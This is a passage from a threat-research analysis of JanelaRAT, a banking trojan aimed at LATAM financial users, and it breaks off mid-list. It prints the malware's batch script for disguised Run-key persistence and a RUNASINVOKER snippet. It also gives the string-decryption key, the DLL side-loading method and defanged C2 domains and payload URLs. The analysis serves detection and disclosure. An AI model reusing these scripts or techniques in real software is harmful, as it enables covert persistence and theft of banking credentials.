Category: Threat Research

Introduction

In June of 2023, our research team at Zscaler ThreatLabz discovered a threat actor targeting FinTech users in the LATAM region. JanelaRAT involves several tactics, techniques, and procedures (TTPs) such as DLL side-loading, dynamic C2 infrastructure, and a multi-stage attack.

The final malware involved in this campaign is a heavily modified variant of BX RAT. Because of this, we named the malware: JanelaRAT.
Key Takeaways

Financial Data in LATAM: As of June 2023, JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions.
New, Nefarious Capabilities: JanelaRAT features a windows titles sensibility mechanism that allows the malware to capture window title data and send it to the threat attackers.
Strategic and Exploitative Behavior: JanelaRAT employs a dynamic socket configuration system. The C2 infrastructure used by the threat attackers heavily abuses dynamic DNS services. Each domain is set up in the infrastructure to be active only on a certain day of the month.
Evasive Maneuvers: JanelaRAT abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection.
Origin of Threat Actor: The developer of JanelaRAT is Portuguese-speaking. There is heavy use of Portuguese in the malware strings, metadata, decrypted strings, etc.

Attack Chain

This campaign involves a multi-stage infection chain with a moderate complexity level.

The attack chain is kick started by a VBScript sent inside ZIP archives. (At the time of writing this blog, we do not know exactly how these ZIP archives were distributed to the users.)
The VBScript performs two key actions:

It fetches a ZIP archive from the attackers' server
It drops a BAT file on the endpoint to prepare the system for the next stage of infection

The ZIP archive contains two components which are responsible for carrying out the rest of the infection chain and accomplish DLL side-loading.

The image below is a high-level view of the campaign’s attack chain.

Figure 1: End-to-end attack chain of the campaign used to distribute JanelaRAT
Technical Analysis

VBScript Analysis

For the purposes of technical analysis, we used this VBScript with MD5 hash:

24c6bff8ebfd532f91ebe06dc13637cb

The code obfuscation in the VBScript is very primitive. After decoding all the strings in the VBScript, its purpose became evident to our team.

The main operations performed by the VBScript are as follows:

Drops a BAT file in the path: C:UsersPublic with a randomly generated 7-character alphanumeric name.
Downloads content from the URL: hxxp://zimbawhite.is-certified[.]com:3001/clientes/6 and parses it to extract a base64-encoded ZIP archive.
Base64 decodes the content and saves the ZIP archive with a randomly generated 8-character alphanumeric file name.
Executes the BAT file.
Sleeps for 5 seconds and restarts the victim's machine.

We observed that the URL used to download the base64-encoded ZIP archive was actually hosting 44 different variants of the archives, all stored base64-encoded. Since the URL was active at the time of our analysis, we were able to download all 44 variants of the ZIP archives. A Python script is included in the Appendix section of this blog to help you automate this process.

The image below shows the web response when the URL is accessed directly without specifying the index. The response contains all 44 ZIP archives base64-encoded.

Figure 2: Base64-encoded ZIP archives received in web response from attacker's server

All these ZIP archives include components with different file hashes but similar functionality. This indicates that the main purpose of this method is evasion of file hash-based detection.

Batch Script Analysis

Batch script persistently triggers the JanelaRAT execution (via DLL side-loading)

@echo off
timeout /t 2 /nobreak >nul
xcopy /q C:UsersPublicQ3xk0oVCRUNTIME140.dll C:UserswilliAppDataRoaming
timeout /t 2 /nobreak >nul
xcopy /q C:UsersPublicQ3xk0oopdrde.exe C:UserswilliAppDataRoaming
timeout /t 2 /nobreak >nul
timeout /t 2 /nobreak >nul
ren C:UserswilliAppDataRoamingopdrde.exe IWf2u49.exe
timeout /t 2 /nobreak >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v MicrosoftEdgeAutoLaunch_ /d C:UserswilliAppDataRoamingIWf2u49.exe /f
set "pasta=C:UsersPublicQ3xk0o"
rmdir /s /q "%pasta%"

The purpose of the batch script is to set up a persistent mechanism so the JanelaRAT sample is automatically launched at each system reboot. This is achieved by:

Setting up a so-called RunKey. This allows a particular registry key hosting the path to a file and granting that file execution at reboot time.
The batch script set the RunKey to the legitimate executable included in the second compressed archive.
The execution of that file will cause the loading and execution of the JanelaRAT DLL.

The key name (MicrosoftEdgeAutoLaunch_) was chosen so it can appear innocuous, like the legitimate RunKey for the Microsoft Edge browser.

DLL side-loading

JanelaRAT comes in the form of a DLL side-loaded by a legitimate executable. Depending on the legitimate executable employed in the attack, the DLL may have different names.

We discovered these two:

VCRUNTIME140.dll: side-loaded by vmnat.exe
msedge_elf.dll: side-loaded by identity_helper.exe

The legitimate executable, which is included in the compressed archive with JanelaRat, is usually renamed.

In the table below, you can see metadata information of the JanelaRAT sample we used for technical analysis in this section

Metadata information of the analyzed JanelaRAT instance

Name
VCRUNTIME140.dll

MD5
c18edb805748b4bd5013ccb47f061c2a

SHA1
37df375be813d91e11795a75872479c1a656e951

SHA256
0c873439bc0af08fdf0c335c5a94752413fd096c0c2f1138f17e786bc5ce59c3

The DLL was developed in C# for Microsoft .NET 4.0 and the source code is protected by Eazobfuscator – a commercial code obfuscator for .NET assemblies.

The image below shows the assembly metadata containing clear-text strings in Portuguese, supporting our hypothesis about the threat attacker's intention to make JanelaRAT seem like a real cybersecurity tool. For instance:

"Firewall de Rede" means network firewall
"Plataforma de Segurança Mulitcanal" means multichannel security platform
"Ferramenta de Segurança Inteligente" means smart security tool
"Análise de Segurança de Banco de Dados" means database security analysis

At a glance, these seemingly legitimate security strings can make JanelaRAT appear like a real cybersecurity tool.

Figure 3: JanelaRAT impersonating as a cybersecurity tool using well-crafted metadata
Self-Defense Mechanisms

String encryption

Most of the JanelaRAT strings are encrypted and stored in a dedicated class as a form of anti-analysis. Each field of this class contains either an encrypted string or an array of encrypted strings. The string decryption algorithm can be broken down in the following steps:

The encrypted string is decoded using base64.
Once decoded, the string is decrypted. The decryption algorithm is Rijndael AES in Cipher Block Chaining (CBC) mode.

The decryption key is always the same for all the strings and, to the best of our knowledge, it is the same across the samples: the MD5 of the string 8521.
The Initialization Vector (IV) varies for each string, being set to the first 16 bytes of the string decoded in the point above. The decryption is only applied to the remaining bytes.

We provide a Python implementation of this algorithm in the Appendix section of this blog.

Idle if inactive

JanelaRAT utilizes a basic self-protection mechanism to mitigate the risk of being detected.

Every 5 seconds the malware checks the time elapsed from the system start to the last input event that occurred on the infected system.
If this time span exceeds 10 minutes then the malware transitions into an idle state.
While in the idle state, JanelaRAT stays silent by not exposing any unnecessarily risky behavior that might arouse suspicion.

The image below shows the method used to perform the inactivity check. The method call is a wrapper around the GetLastInputInfo native API, responsible for instantiating a LASTINPUTINFO data structure. The dwTime field of such a structure contains the milliseconds elapsed since the last input event. The method returns true if the amount of time passed from the system start (Environment.TickCount), to the last input received (dwTime), exceeds 10 minutesFigure 4: JanelaRAT checks if the infected system has been inactive (no input events) for more than 10 minutes

In the image below, you can see that:

if the check returns true, the malware sets its internal state to "Idle"
if the check returns false, the malware sets its internal state to "Active"

The state transition, regardless if true or false, is communicated to the threat attacker through the C2. You can see this in action in the image below.

Figure 5: JanelaRAT communicating state transition to threat actors using C2
Network and Communication

C2 check-in

Once it gets started, JanelaRAT makes a request to register the newly-infected host to the threat attacker’s network.

The C2 domain is always the same: cnt-blackrock.geekgalaxy[.]com
The HTTP verb is GET
The User-Agent is hardcoded and rather peculiar: VisaoAPP

The image below shows that the GET request consists of four parameters.

Figure 6: JanelaRAT checks-in to the attacker's network of compromised hosts

JanelaRAT's request parameters to join attacker's network

Parameter
Description

op
Quadruple (OS major, OS minor, OS architecture code, OS integer pointers size). The quadruple is provided as a pipe-separated (“|”) string. Example: 0|4|2|32

us
Role of the user logged in at the time of request. Supported values: Admin, User, Convidado (Guest in Portuguese), and Desconhecido (Unknown in Portuguese).

nm
Machine name

vs
Malware version string, e.g. 1.0.6.4.

The malware makes this request attempt only if it doesn’t find a file named fi.ini in the temporary files directory. Any response from the server isn't handled.

C2 rotation and communication

The JanelaRAT configuration contains 32 domains used for C2 communication. Those domains are encrypted with the algorithm described earlier in the String Encryption section. The selection in that array is guided by the day of the month when making the request.

For example, the following table shows the domain array for all the JanelaRAT samples we analyzed.

JanelaRAT C2 domains

0
aigodmoney009[.]access[.]ly
11
myfunbmdablo99[.]hosthampster[.]com
22
minfintymexbr[.]geekgalaxy[.]com

1
freelascdmx979[.]couchpotatofries[.]org
12
irocketxmtm[.]hopto[.]me
23
cinfintymex[.]geekgalaxy[.]com

2
439mdxmex[.]damnserver[.]com
13
hotdiamond777[.]loginto[.]me
24
9mdxmex[.]damnserver[.]com

3
897midasgold[.]ddns[.]me
14
imrpc7987bm[.]mmafan[.]biz
25
ikmidasgold[.]ddns[.]me

4
disrupmoney979[.]ditchyourip[.]com
15
dmrpc77bm[.]myactivedirectory[.]com
26
rexsrupmoney979[.]ditchyourip[.]com

5
kakarotomx[.]dnsfor[.]me
16
jxjmrpc797bm[.]mydissent[.]net
27
kktkarotomx[.]dnsfor[.]me

6
skigoldmex[.]dvrcam[.]info
17
askmrpc747bm[.]mymediapc[.]net
28
megaskigoldmex[.]dvrcam[.]info

7
i89bydzi[.]dynns[.]com
18
myinfintyme09[.]geekgalaxy[.]com
29
izt89bydzi[.]dynns[.]com

8
infintymexbrock[.]geekgalaxy[.]com
19
infintymex747[.]geekgalaxy[.]com
30
zeedinfintymexbrock[.]geekgalaxy[.]com

9
brockmex57[.]golffan[.]us
20
infintymexb[.]geekgalaxy[.]com
31
zeedinfintymexbrock[.]geekgalaxy[.]com

10
j1d3c3mex[.]homesecuritypc[.]com
21
jinfintymexbr[.]geekgalaxy[.]com

As you may notice, there is an extra domain at index 0 that will never be used by the C2 domain rotation algorithm. Furthermore, the domains for day 30 and day 31 are the same.

The C2 channel is implemented as a socket opened to the resolution IP of the daily C2 domain. The socket port is obtained by making a request for a text file named 16Psyche.txt. This file contains just the port, encrypted with the algorithm discussed in the String Encryption section.

JanelaRAT implements a custom protocol to communicate with the C2. This protocol is defined by a hierarchy of classes representing the type of messages expected to be exchanged between the malware samples and the C2 server. We call those messages "packets" because this feature was imported from BX RAT, where all those classes implement the same interface called "packet". We found packets for:

mouse inputs
keyboard inputs
screenshot captures
and more

When any of those packets is instantiated to be shipped through the C2 channel, the instance is:

serialized into an array of integers
encrypted with a custom implementation of RC4 with key 8521
compressed with a custom implementation of the LZ4 algorithm
eventually sent through the C2 channel

The image below shows an example a packet class representing a sequence of keystrokes sent by the threat attacker to the malware so that they can be sent to the targeted window. This class defines specific fields (e.g., the string containing the keystrokes) with a method responsible for implementing the communication procedure.

Figure 7: Example of packet class used by JanelaRAT to implement its C2 communication procedure
Capabilities

Capture and check window data

JanelaRAT captures the content of windows title bars and checks if they are interesting for the threat attacker. "Interesting" titles will be related to financial and banking data.

The malware implements a periodic behavior triggered every second and consists of three consecutive stages.

Stage 1

At the first stage, JanelaRAT checks if it obtained a list of interesting title bars. If not, then the malware requests a text file named kepler186f.txt to the C2. The content is encrypted with the same algorithm used for the strings. (Since the campaign was still active at the time of analysis, we were able to download an instance of such a file.) Once decrypted, you can see that it consists of a pipe-separated ("|") list of capitalized windows titles.

You can see an excerpt of the decrypted content in the box below.

Excerpt from an instance of kepler186f.txt

BANCOAZTECATUBANCAENLNEASUEASDECIDESLOGRAS|BITCOIN|SOLANA|ACTINVER|ACCESOALSISTEMABURSANET|ACTINVERBANCO|
ACCESOCONSULTADESALDOS|EACTINVER|ACCESOABANCABANCOAZTECA|BIENVENIDOSALABANCAENLNEABBVAMXICO|EMPRESASYG
OBIERNOEMPRESASBBVAMXICO|INDEXBBVANET|BBVANETCASH|SANTANDERMXICOSPARTEDELABANCAELECTRNICA|BITCOIN|BTC|RIPP
LE|ETHEREUM|CASADEVECTOR|SANTANDER|SANTANDERM|ENLACESANTANDERCOMMXLOGBETENSCHANNELDRIVERSSOBTODSEOPE
RATIONNAMELOGINDSENEXTEVENTNAMESTARTDSEPROCESSORSTATEINITIALNOWCHECKINGCOOKIES|BANCOSANTANDERS|BBCOMM
XWEBCENTERPORTALBANBAJIOHOME|ELBANCODECONFIANZAPARAPERSONASPYMESGOBIERNOYAGRONEGOCIOS|BANCAPORINTERN
ETBBCOMMX| … [REDACTED]

Kepler186f.txt file content is parsed as an array of strings and stored as a class field for future use.

Stage 2

At the second stage, JanelaRAT checks the same DLL directory for the block.blq file. This file has a slightly different structure compared to the kepler186f.txt file. It is still composed of a single, pipe-separated, record but it only contains three fields:

a timestamp,
a base64-encoded image
a list of dash-separated ("-") window titles

The image below shows a snippet, belonging to the malware code, implementing the parsing logic for block.blq. If the file is outdated, then the malware deletes it.

Figure 8: JanelaRAT code snippet implementing the parser for block.blq file content

The window titles included as the third field in block.blq are titles of windows the attacker wants to block. When the title of the foreground window is included in the block.blq, the malware attempts to close it. The blocking mechanism is implemented by invoking the SendMessage API with WM_CLOSE value for the Msg argument. JanelaRat also visualizes a dialog to the victim showing a fake error message.

Stage 3

At the third stage, the malware checks if the title of the window in the foreground is appealing. The check is made after grabbing the title, capitalizing it, and eventually dropping all non-alphabetical characters. By "appealing", we mean what was discussed at Stage 1 (i.e., the title was in a previously parsed instance of kepler186f.txt). If the check succeeds, JanelaRAT opens a C2 channel in the form of a socket as discussed earlier. This channel is later used for alerting the threat attacker about the victim opening interesting windows, sending key logs, mouse clicks, and implementing remote desktop sessions.

Acquire host profile details

JanelaRAT is capable of collecting and sending information about the compromised host to the attacker. This information is encapsulated in a packet containing the fields reported in the following table. As you can see, the field names don't always correlate with their actual content. Moreover, some fields are left to the default values. Those aspects suggest that the original malware source code has been eventually modified or repurposed to fit the new needs of the operator.

JanelaRAT sends basic information about the compromised host to the attacker

Field Name
Field Value

Version
JanelaRAT version string. Hardcoded as 1.0.6.4 for the sample discussed in this section. One of the few unencrypted strings embedded in the malware.

OperatingSystem
A pipe-separated string containing the following fields: OS version major, OS version minor, OS platform, integer pointers size. Example: 0|4|2|32.

AccountType
A dash-separated string containing the following fields:
Role of the user logged in at time of request. Supported values: Admin, User, Convidado (Guest in Portuguese), and Desconhecido (Unknown in Portuguese).

Country
A string containing the title of the last “interesting” window opened by the user. For interesting, we mean that is included in the content of the kepler186f.txt file (previously discussed). All non-alphabetical symbols are removed from the original title bar and the chars are upper-cased.

CountryCode
Empty string.

Region
Empty string.

City
Empty string.

ImageIndex
0

Track mouse movements

JanelaRAT is capable of sending mouse activity to through C2. It defines a packet class containing the following fields:

x-position of the cursor
y-position of the cursor
a boolean value set to true if the left button of the mouse is clicked
a boolean value set to true if the left button of the mouse was double clicked

Once serialized, an instance of this class is shipped.

Track system usage

JanelaRAT is capable of gathering additional information about the infected system usage.

System usage information gathered by JanelaRAT

Index
Element

0
User

1
[username of the user currently logged in]

2
PC

3
[machine name]

4
Ligado [connected in Portuguese, ed.]

5
[time elapsed since the last system reboot. It’s a string having the format {0}d : {1}h : {2}m : {3}s where {0}, {1}, {2}, {3} are placeholders for the number of days, hours, minutes, and seconds respectively]

6
IP

7
[comma-separated list of IP addresses currently associated with the infected system]

The malware assembles an array of strings containing the elements shown in the table above. Once assembled, the array is sent to the C2.

Open message boxes on the infected system

JanelaRAT gives a threat attacker the ability to open message boxes on the infected system, which may influence the behaviour of the user. After having shown the message box, the malware sends an acknowledgment to the C2. The acknowledge is another packet class containing a single field of type string called "Message" and instantiated with the value Mensagem mostrada ("Message shown" in Portuguese).

Perform actions

JanelaRAT is capable of performing a wide range of actions on the attacker’s behalf. Those actions are identified by an integer number called "Mode".

JanelaRAT is capable of performing action on behalf of the attacker

Mode
Description

1
Shuts down the infected system by issuing the shutdown shell command.

2
Suspends the infected system.

5
Enables mouse synthesization. This mode allows the attacker to simulate the mouse and issue clicks or double-clicks for the left button.

6
Enables sleep for one second.

8
Enables sleep for one second.

9
Create a file named 1.bat under the user directory. That file contains the following batch script:

cmd /min /C set __COMPAT_LAYER=RUNASINVOKER && start #1
cmd /min /C REG ADD HKCUControl PanelDesktop /v Win8DpiScaling /t REG_DWORD /d 0x00000001 /f
cmd /min /C REG ADD HKCUControl PanelDesktop /v LogPixels /t REG_DWORD /d 0x00000060 /f

The purpose of this script is to fix potential errors in rendering fonts. This script is executed with %SystemRoot%taskmgr.exe as its first argument, resulting in executing the Task Manager application without requesting administrative privileges. The task Manager window is immediately hidden by running ShowWindow API with the SW_HIDE value for the nCmdShow argument. Finally, 1.bat is removed.

10
Deletes the file block.blq if it exists in the same folder as JanelaRAT.

11
Sends a test email by starting a new process with mailto: